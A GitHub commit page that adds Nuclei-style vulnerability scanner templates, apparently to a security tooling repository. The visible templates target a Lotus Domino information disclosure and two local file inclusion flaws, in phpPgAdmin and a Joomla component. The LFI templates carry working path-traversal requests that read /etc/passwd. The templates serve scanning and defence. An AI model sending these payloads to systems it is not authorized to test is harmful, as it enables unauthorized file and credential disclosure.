-
Notifications
You must be signed in to change notification settings - Fork 52
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
test
committed
Sep 9, 2024
1 parent
d71bf7c
commit 55d4582
Showing
3,589 changed files
with
59,275 additions
and
115,751 deletions.
The diff you're trying to view is too large. We only load the first 3000 changed files.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
File renamed without changes.
File renamed without changes.
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
id: CVE-2005-2428 | ||
info: | ||
name: Lotus Domino R5 and R6 WebMail Default Configuration Information Disclosure | ||
author: CasperGN | ||
severity: medium | ||
tags: cve,cve2005,domino | ||
description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696). | ||
remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files. | ||
reference: | ||
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf | ||
- https://www.exploit-db.com/exploits/39495 | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N | ||
cvss-score: 5.3 | ||
cve-id: CVE-2005-2428 | ||
cwe-id: CWE-200 | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/names.nsf/People?OpenView" | ||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
- type: regex | ||
name: domino-username | ||
regex: | ||
- '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)' | ||
part: body | ||
|
||
# Enhanced by mp on 2022/02/02 |
This file was deleted.
Oops, something went wrong.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,28 @@ | ||
id: CVE-2008-5587 | ||
info: | ||
name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion | ||
author: dhiyaneshDK | ||
severity: medium | ||
description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php. | ||
reference: | ||
- https://www.exploit-db.com/exploits/7363 | ||
- http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/ | ||
- http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014 | ||
- http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263 | ||
classification: | ||
cve-id: CVE-2008-5587 | ||
metadata: | ||
shodan-query: http.title:"phpPgAdmin" | ||
tags: cve,cve2008,lfi,phppgadmin | ||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00' | ||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
regex: | ||
- "root:[x*]:0:0" | ||
- type: status | ||
status: | ||
- 200 |
File renamed without changes.
File renamed without changes.
File renamed without changes.
This file was deleted.
Oops, something went wrong.
This file was deleted.
Oops, something went wrong.
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
id: CVE-2009-2015 | ||
|
||
info: | ||
name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion | ||
author: daffainfo | ||
severity: high | ||
description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. | ||
reference: | ||
- https://www.exploit-db.com/exploits/8898 | ||
- https://www.cvedetails.com/cve/CVE-2009-2015 | ||
tags: cve,cve2009,joomla,lfi | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd" | ||
|
||
matchers-condition: and | ||
matchers: | ||
|
||
- type: regex | ||
regex: | ||
- "root:.*:0:0" | ||
|
||
- type: status | ||
status: | ||
- 200 |
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
This file was deleted.
Oops, something went wrong.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
This file was deleted.
Oops, something went wrong.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
This file was deleted.
Oops, something went wrong.
Oops, something went wrong.